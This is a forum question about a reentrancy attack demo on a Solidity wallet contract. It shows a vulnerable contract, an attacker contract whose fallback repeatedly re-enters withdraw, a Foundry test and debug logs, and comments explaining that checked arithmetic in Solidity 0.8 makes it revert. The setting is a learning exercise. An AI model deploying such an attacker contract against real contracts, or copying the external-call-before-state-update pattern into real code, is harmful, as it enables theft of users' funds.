# Failed to demonstrate a Re-entrancy attack due to arithmetic underflow

Tags: attacks, reentrant-attacks

I try to do re-entrancy on a contract for testing purposes, but I encountered an error when doing so.

Here's the targeted contract

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {console} from "forge-std/Console.sol";

contract Wallet {
    mapping(address => uint256) public balances;

    function deposit(address _to) public payable {
        balances[_to] = balances[_to] + msg.value;
    }

    function balanceOf(address _who) public view returns (uint256 balance) {
        return balances[_who];
    }

    function withdraw(uint256 _amount) public {
        if (balances[msg.sender] >= _amount) {
            (bool result,) = msg.sender.call{value: _amount}("");
            require(result, "External call returned false");
            balances[msg.sender] -= _amount;
        }
    }

    receive() external payable {}
}
```

Here's my attacker contract

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {console} from "forge-std/Console.sol";

contract AttackWallet {
    event WithdrawalSuccessfulEvent();
    event WithdrawalFailedEvent();

    address public wallet;
    uint256 public constant AMOUNT = 1 ether;
    address immutable owner;

    modifier onlyOwner() {
        require(msg.sender == owner, "You are not the owner");
        _;
    }

    constructor(address _wallet) {
        wallet = _wallet;
        owner = msg.sender;
    }

    fallback() external payable {
        if (wallet.balance >= AMOUNT) {
            (bool ok,) = wallet.call(abi.encodeWithSignature("withdraw(uint256)", AMOUNT));
            require(ok, "withdraw failed fallback");
        }
    }

    function attack() public {
        if (wallet.balance >= AMOUNT) {
            (bool ok,) = wallet.call(abi.encodeWithSignature("withdraw(uint256)", AMOUNT));
            if (ok) {
                console.log("success");
                emit WithdrawalSuccessfulEvent();
                return;
            } else {
                console.log("failed");
                emit WithdrawalFailedEvent();
            }

            require(ok, "withdraw failed attack");
        }
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }

    function withdraw() public onlyOwner {
        payable(owner).transfer(address(this).balance);
    }
}
```

Here's my testing contract

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test, console} from "forge-std/Test.sol";
import {AttackWallet} from "../src/AttackWallet.sol";
import {Wallet} from "../src/Wallet.sol";

contract TestAttackWallet is Test {
    AttackWallet public attackWallet;
    Wallet public wallet;
    address user1 = makeAddr("user1");
    address user2 = makeAddr("user2");
    address user3 = makeAddr("user3");
    address user4 = makeAddr("user4");
    address user5 = makeAddr("user5");

    address[5] public users = [user1, user2, user3, user4, user5];

    address attacker = makeAddr("attacker");

    function setUp() public {
        wallet = new Wallet();
        deal(attacker, 2 ether);

        for (uint256 i = 0; i < 5; i++) {
            deal(users[i], 1 ether);
            vm.prank(users[i]);
            wallet.deposit{value: 1 ether}(users[i]);
        }
    }

    function testWalletBalance() public {
        assertEq(address(wallet).balance, 5 ether);
    }

    function testAttackWallet() public {
        vm.startPrank(attacker);
        attackWallet = new AttackWallet(address(wallet));
        wallet.deposit{value: 1 ether}(address(attackWallet));
        attackWallet.attack();
        assertEq(wallet.balanceOf(address(attackWallet)), 6 ether);
        vm.stopPrank();
    }
}
```

I kept getting error and I added some logs to the code to know where things goes wrong, and the logs are as follows

```
function withdraw(uint256 _amount) public {
        if (balances[msg.sender] >= _amount) {
            console.log("before external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<");
            console.log("attacker balance in each call: " ,msg.sender.balance);
            (bool result,) = msg.sender.call{value: _amount}("");
            console.log("after external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<");
            require(result, "External call returned false");
            console.log("after require <<<<<<<<<<<<<<<<<<<<<<<<<<<<<");
            balances[msg.sender] -= _amount;
            console.log("after substract <<<<<<<<<<<<<<<<<<<<<<<<<<<<<");
            console.log("attacker balance: ", msg.sender.balance);
            console.log("wallet balance: ", address(this).balance);
        }
    }
```

```
Logs:
  before external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  attacker balance in each call:  0
  before external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  attacker balance in each call:  1000000000000000000
  before external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  attacker balance in each call:  2000000000000000000
  before external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  attacker balance in each call:  3000000000000000000
  before external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  attacker balance in each call:  4000000000000000000
  before external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  attacker balance in each call:  5000000000000000000
  after external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  after require <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  after substract <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  attacker balance:  6000000000000000000
  wallet balance:  0
  after external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  after require <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  after external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  after external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  after external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  after external call <<<<<<<<<<<<<<<<<<<<<<<<<<<<<
  failed
```

The attacker already succeeded in getting the balances but I don't know why it keep looping and resulting in arithmetic underflow due to substracting the balances of `msg.sender` which at this point already zero.

Comment: I don't think the Wallet contract is exploitable. Where did you find it?

Comment: @0xSanson it’s one of the question to apply for internship, I’m curious why it’s not exploitable eventho the effect happens after interacting with external contract ?

Comment: Bacause for every `x` ETH you withdraw, it subtracts `x` ETH to `balances`. There's no way to escape that line, or to increase `balances` without a fair deposit. I feel like this contract was supposed to be compiled with an older solidity version, where there's no underflow errors.

Comment: @0xSanson so theoretically it still vulnerable to re-entrancy in the older version of compiler ?

Comment: Yes it's vulnerable for older versions, when there was no automatic underflow detector

Comment: @0xSanson thx for the answer